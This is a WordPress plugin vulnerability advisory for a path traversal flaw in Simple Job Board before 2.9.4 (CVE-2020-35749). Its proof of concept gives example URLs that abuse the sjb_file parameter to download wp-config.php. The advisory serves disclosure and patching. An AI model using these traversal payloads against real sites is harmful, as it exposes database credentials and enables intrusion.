WordPress Plugin Vulnerabilities

Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download

Description

The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack

Proof of Concept

The sjb_file parameter to use may depends on the configuration of the plugin, e.g:

https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=var/www/wp-config.php
https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../wp-config.php

Affects Plugins

Plugin icon
simple-job-board
Fixed in 2.9.4

References

CVE
CVE-2020-35749
Exploitdb
49450
URL
https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Arcangelo Saracino
Verified
Yes
WPVDB ID
eed3bd69-2faf-4bc9-915c-c36211ef9e2d

Timeline

Publicly Published
2021-01-15 (about 3 years ago)
Added
2021-01-15 (about 3 years ago)
Last Updated
2021-01-23 (about 3 years ago)

Other

Published
Title
Published
2022-08-22
Title
WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read
Published
2022-07-27
Title
WordPress Team Members Showcase < 4.1.2 - Subscriber+ Arbitrary File Read and Deletion
Published
2022-06-06
Title
Product Configurator for WooCommerce < 1.2.32 - Unauthenticated Arbitrary File Deletion
Published
2020-03-13
Title
WordPress File Upload < 4.13.0 - Directory Traversal to RCE
Published
2019-10-11
Title
ArForms < 4.0 - Unauthenticated Arbitrary File Deletion via Traversal